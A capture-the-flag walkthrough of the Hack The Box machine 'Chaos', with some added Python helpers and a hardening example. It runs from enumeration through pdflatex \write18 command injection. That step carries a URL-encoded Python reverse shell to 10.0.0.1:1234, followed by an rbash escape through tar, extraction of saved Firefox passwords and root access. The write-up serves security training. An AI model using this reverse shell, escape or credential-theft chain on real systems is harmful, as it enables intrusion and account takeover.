HTB Chaos — Walkthrough

root@ArmourInfosec:~# nmap -sV -sC -p- 10.10.10.120
Nmap scan report for 10.10.10.120
Host is up (0.24s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP STLS RESP-CODES PIPELINING SASL AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more have ID ENABLE IMAP4rev1 LITERAL+ post-login STARTTLS capabilities Pre-login OK LOGINDISABLEDA0001 listed LOGIN-REFERRALS IDLE SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more ID ENABLE IMAP4rev1 LITERAL+ have post-login AUTH=PLAINA0001 capabilities Pre-login OK listed LOGIN-REFERRALS IDLE SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) RESP-CODES PIPELINING USER AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visiting port 80 only shows the text “Direct IP Access Not Allowed”, so I added chaos.htb to /etc/hosts and brute-forced directories on http://10.10.10.120:

root@ArmourInfosec:~# gobuster -u http://10.10.10.120 -w /usr/share/wordlists/dirb/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.120/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/24 05:56:59 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/wp (Status: 301)
=====================================================
2019/05/24 05:57:34 Finished
=====================================================

Under /wp/wordpress there is a WordPress site with a password-protected post written by the user human.

Guessing its password, I found it to be human.

Opening the post revealed the following text:

Creds for webmail: username ayush, password jiujitsu

I tried these credentials on the Webmin instance on port 10000, but the login failed. Then I remembered that a POP3 server is running on the box, so I tried the same credentials there:

root@ArmourInfosec:~# nc 10.10.10.120 110
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

Dovecot refuses plaintext authentication without TLS (it advertises STLS, so STARTTLS on 110 would also work), so instead we connect to port 995 (POP3 over TLS) with openssl:

root@ArmourInfosec:~/# openssl s_client -connect 10.10.10.120:995

The login succeeded, but the mailbox was empty. POP3 only exposes the inbox; to see all mail, including sent items and drafts, I used Thunderbird over IMAP.

Below are the steps to connect to the mail server with Thunderbird:

  1. Open Thunderbird.
  2. Under “Set up an account”, choose Email.
  3. Enter the username and password from the WordPress post; in the email field enter something@gmail.com and click Continue.
  4. Click Manual configuration and change Authentication to Normal password for both incoming and outgoing.
  5. Click Advanced Configuration, change the server name to the machine IP, remove @gmail.com from the username and click OK. Then click Read Messages; when prompted, enter the password and you are connected.
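The same enumeration can be scripted instead of clicking through Thunderbird. The block below is an added example (not part of the original walkthrough): it logs in over IMAPS on 993, which is open per the scan, locates the Drafts folder and pulls every attachment out of the messages there. POP3 is the wrong protocol for this, since it only serves the INBOX and has no folders. The host, credentials, folder name and the sample message used for offline testing are assumptions constructed for the example; the certificate check is disabled because the box presents a self-signed certificate with CN=chaos.

```python
"""Enumerate a Dovecot mailbox over IMAPS and save draft attachments.

Added example, not the walkthrough author's code. Host, credentials and
the constructed sample message are assumptions for illustration only.
"""
import email
import imaplib
import re
import ssl
from email import policy
from email.message import EmailMessage


def extract_attachments(raw: bytes) -> dict:
    """Return {filename: bytes} for every attachment in an RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = {}
    for part in msg.iter_attachments():
        name = part.get_filename()
        if name:
            found[name] = part.get_payload(decode=True)
    return found


def fetch_drafts(host: str, user: str, password: str, port: int = 993) -> list:
    """Log in with implicit TLS, find the Drafts folder, return raw messages."""
    # Self-signed cert (CN=chaos) on the target, so verification is off here;
    # on a real engagement pin the certificate fingerprint instead.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with imaplib.IMAP4_SSL(host, port, ssl_context=ctx) as imap:
        imap.login(user, password)
        _, boxes = imap.list()
        # LIST lines look like: (\HasNoChildren \Drafts) "." Drafts
        drafts = "Drafts"
        for line in boxes:
            if b"Drafts" in line:
                drafts = line.decode().rsplit(" ", 1)[-1].strip('"')
        imap.select(drafts, readonly=True)
        _, ids = imap.search(None, "ALL")
        messages = []
        for num in ids[0].split():
            _, data = imap.fetch(num, "(RFC822)")
            messages.append(data[0][1])
        return messages


def constructed_sample() -> bytes:
    """A made-up draft shaped like the one on the box, for offline testing."""
    m = EmailMessage()
    m["From"] = "ayush@chaos"
    m["To"] = "sahay@chaos"
    m["Subject"] = "check this"
    m.set_content("Hii, sahay\nCheck the enim_msg.txt\nYou are the password XD.\n")
    m.add_attachment(b"import os\n# encryptor goes here\n",
                     maintype="text", subtype="x-python", filename="encrypt.py")
    # 16-byte header + 16-byte IV + 32 bytes of "ciphertext", all constructed
    m.add_attachment(b"\x00" * 16 + b"\x11" * 16 + b"\x22" * 32,
                     maintype="application", subtype="octet-stream",
                     filename="enim_msg.txt")
    return m.as_bytes()


if __name__ == "__main__":
    for raw in fetch_drafts("10.10.10.120", "ayush", "jiujitsu"):
        for name, blob in extract_attachments(raw).items():
            safe = re.sub(r"[^A-Za-z0-9._-]", "_", name)  # no path tricks from attachment names
            with open(safe, "wb") as fh:
                fh.write(blob)
            print(f"saved {safe} ({len(blob)} bytes)")
```

Run it against the box and the two attachments from the draft land in the current directory; the filename sanitising matters because an attachment name is attacker-controlled data when you do this on a mailbox you do not own.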

In the Drafts folder there is a message from ayush to sahay with two attachments, encrypt.py and enim_msg.txt:

Hii, sahay 
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

From this message we know that the decryption password is sahay and that encrypt.py is the script used to encrypt the file, so we can write the inverse of that script to decrypt the message.

Running the decryption script I wrote, which prompts for the file and the password:

root@ArmourInfosec:~# python decrypt.py
Enter filename: enim_msg.txt
Enter password: sahay
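The post does not reproduce decrypt.py, so the block below is an added decryptor of my own, not the author's script. It assumes the file layout of the encrypt.py that circulated for this box: a 16-digit zero-padded length, a 16-byte IV, then AES-256-CBC under the key SHA-256(password) with the last block padded with spaces rather than PKCS#7. It also assumes the openssl command-line tool is installed and shells out to it for AES so that no third-party Python package is needed; encrypt_bytes mirrors the assumed format only to build test input.

```python
"""Decrypt a file produced by the box's encrypt.py (assumed format, see above).

Added example, not the walkthrough author's decrypt.py. Layout assumed:
  bytes 0..15   original size, ASCII digits zero-padded to 16
  bytes 16..31  random AES IV
  rest          AES-256-CBC, key = SHA-256(password), space padding
The openssl CLI is assumed to be present.
"""
import hashlib
import os
import subprocess


def _aes_cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool) -> bytes:
    op = ["-d"] if decrypt else []
    return subprocess.run(
        ["openssl", "enc", "-aes-256-cbc", *op, "-nopad",
         "-K", key.hex(), "-iv", iv.hex()],
        input=data, capture_output=True, check=True).stdout


def derive_key(password: str) -> bytes:
    # A bare SHA-256 of the password: no salt, no stretching. A guessable
    # password like "sahay" is therefore all the protection the file has.
    return hashlib.sha256(password.encode()).digest()


def encrypt_bytes(plaintext: bytes, password: str, iv: bytes = None) -> bytes:
    """Mirror of the assumed encrypt.py format, used to build test input."""
    iv = iv or os.urandom(16)
    padded = plaintext + b" " * (-len(plaintext) % 16)
    header = str(len(plaintext)).zfill(16).encode()
    return header + iv + _aes_cbc(derive_key(password), iv, padded, False)


def decrypt_bytes(blob: bytes, password: str) -> bytes:
    """Reverse encrypt_bytes: parse header and IV, decrypt, drop the padding."""
    if len(blob) < 32 or (len(blob) - 32) % 16:
        raise ValueError("not in encrypt.py format")
    size = int(blob[:16])
    iv = blob[16:32]
    plain = _aes_cbc(derive_key(password), iv, blob[32:], True)
    return plain[:size]


if __name__ == "__main__":
    name = input("Enter filename: ")
    pw = input("Enter password: ")
    # encrypt.py named its output "en" + filename, so strip that prefix back off
    out = name[2:] if name.startswith("en") else name + ".dec"
    with open(name, "rb") as f:
        data = decrypt_bytes(f.read(), pw)
    with open(out, "wb") as f:
        f.write(data)
    print(f"wrote {out}")
```

A wrong password does not raise; CBC with no padding check just yields garbage of the right length, so verify the output (here it should be valid base64) rather than trusting a clean exit.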

It decrypts to im_msg.txt, which contains base64-encoded data; decoding it with cat im_msg.txt | base64 -d gives the following:

Hii Sahay
Please check our new service which create pdf
p.s — As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush

So I visited http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3.

The page is titled Testing PDF maker and says that only one template is working. I tried them all and clicked Create PDF but saw no change, so I intercepted the request; it carries two parameters, content and template.

Testing showed that the working template is test2. The response to that request revealed pdfTeX, Version 3.14159265-2.6-1.40.19, i.e. the submitted content is compiled with pdflatex to produce the PDF. Some research turned up a write-up on hijacking pdflatex. Several of the commands it lists are blocked by the application, but \immediate\write18{id} is not, and it executes the id command (\write18 is pdfTeX's shell-escape primitive, so this only works because the server runs pdflatex with shell escape enabled). Put \immediate\write18{env} in the content parameter and test2 in the template parameter, and the output of the command appears at the bottom of the response.

Now put the following in the content parameter:

\immediate\write18{python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.0.0.1%22%2C1234%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27}

which is the URL encoding of a simple Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a listener on the chosen port (nc -lvnp 1234) and send the request; the reverse connection arrives as soon as the request is processed.
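The root cause here is worth spelling out: the PDF maker hands attacker-controlled content to pdflatex with shell escape enabled, and its command blacklist missed \immediate\write18. The block below is an added example, not the Chaos application's code (the post only shows the parameter names content and template; the wrapper, paths and template handling are assumptions). It shows the vulnerable and hardened pdflatex invocations side by side and a best-effort primitive filter, with a test demonstrating why the filter alone cannot be the control.

```python
"""Vulnerable vs. hardened pdflatex invocation for a 'PDF maker' service.

Added example, not the box's code. The real fix is -no-shell-escape, which
makes \\write18 a no-op regardless of texmf.cnf; the filter is defence in depth.
"""
import re
import tempfile
from pathlib import Path

# Primitives that execute commands or read/write files outside the document.
# Matching is best-effort: TeX can spell \write18 as "\write 18", build it
# with \csname write18\endcsname, or change catcodes, which is exactly why
# this must never be the only control.
DANGEROUS = re.compile(
    r"\\(write\s*18|input\b|include\b|openin\b|openout\b|csname\b|"
    r"catcode\b|InputIfFileExists\b)", re.IGNORECASE)


def find_dangerous_primitives(tex: str) -> list:
    """Return the distinct dangerous primitives present in user-supplied TeX."""
    return sorted({re.sub(r"\s+", "", m.group(1)).lower()
                   for m in DANGEROUS.finditer(tex)})


def build_pdflatex_cmd(tex_file: str, outdir: str, shell_escape: bool) -> list:
    """argv for pdflatex; shell_escape=True reproduces the vulnerable setup."""
    cmd = ["pdflatex", "-interaction=nonstopmode", "-halt-on-error",
           f"-output-directory={outdir}"]
    # -shell-escape lets \write18 spawn /bin/sh with the web server's uid;
    # -no-shell-escape overrides any "shell_escape = t" left in texmf.cnf.
    cmd.append("-shell-escape" if shell_escape else "-no-shell-escape")
    cmd.append(tex_file)
    return cmd


def render(template: str, content: str, shell_escape: bool = False) -> list:
    """Wrap user content in a (hypothetical) template and return the argv to run.

    The hardened path rejects known-dangerous input before it reaches pdflatex
    and then runs pdflatex without shell escape; the vulnerable path
    (shell_escape=True) is the configuration that let the reverse shell through.
    """
    if not shell_escape:
        hits = find_dangerous_primitives(content)
        if hits:
            raise ValueError(f"rejected TeX primitives: {hits}")
    doc = "\\documentclass{article}\\begin{document}" + content + "\\end{document}"
    workdir = tempfile.mkdtemp(prefix=f"{template}-")  # one scratch dir per job
    tex_path = Path(workdir, "doc.tex")
    tex_path.write_text(doc)
    return build_pdflatex_cmd(str(tex_path), workdir, shell_escape)
```

Even with -no-shell-escape, \input and \openin can still read files the web server's user can see, so keep the filter and run the compiler as a low-privilege user in a throwaway directory.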

Getting a proper shell:

  1. Spawn a TTY: python -c 'import pty;pty.spawn("/bin/bash")'
  2. Press Ctrl+Z, run stty raw -echo, then type fg to get the connection back.
  3. Type reset; if you are asked for the terminal type, press Ctrl+C and you will have an interactive shell.
  4. Set the terminal type: export TERM=xterm-256color

The home directory contains two users, ayush and sahay. The credentials from the WordPress post worked for ayush: su ayush with the password jiujitsu logged in, but into a restricted shell (rbash).

BYPASS Restricted Shell:

Typing a disallowed command in the restricted shell gives the error rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names, which confirms that we are in rbash. Some commands still work (dir for a directory listing, for example). To find out which binaries are available, check $PATH, which rbash makes read-only and limits to the permitted directory: echo $PATH gives /home/ayush/.app, and dir on that directory shows three binaries: dir, ping, tar. tar can run an arbitrary program through its checkpoint action, which escapes the restricted shell:

ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

This drops you into an unrestricted bash, but PATH is still /home/ayush/.app, so most commands are not found. Fix that with export PATH=$PATH:/bin (add /usr/bin as well for tools like python); after that all commands work, so cd to ayush's home directory and cat user.txt:

eef39126d9c3b********6970dc713e1

After getting user I started looking for a way to root. Hints on the forum pointed to Firefox, and there is a Firefox profile at ~/.mozilla/firefox/bzo7sjt1.default in ayush's home. Firefox keeps saved logins in the profile: logins.json holds the encrypted usernames and passwords and key4.db holds the key that decrypts them (cert9.db is the certificate store). These files were far larger than in a fresh profile, which suggested saved credentials. The Python script firefox_decrypt.py extracts them from a profile, so I served it from a Python HTTP server, fetched it onto the box and ran it:

ayush@chaos:~$ python firefox_decrypt.py

This prints the saved credentials, including root's, so simply switch user with su:

ayush@chaos:~$ su root
Password:
root@chaos:/home/ayush# cd
root@chaos:~# cat root.txt

4eca7e09e35********4563cfbabbc70

Vaibhav Joshi
Security Researcher | OSCP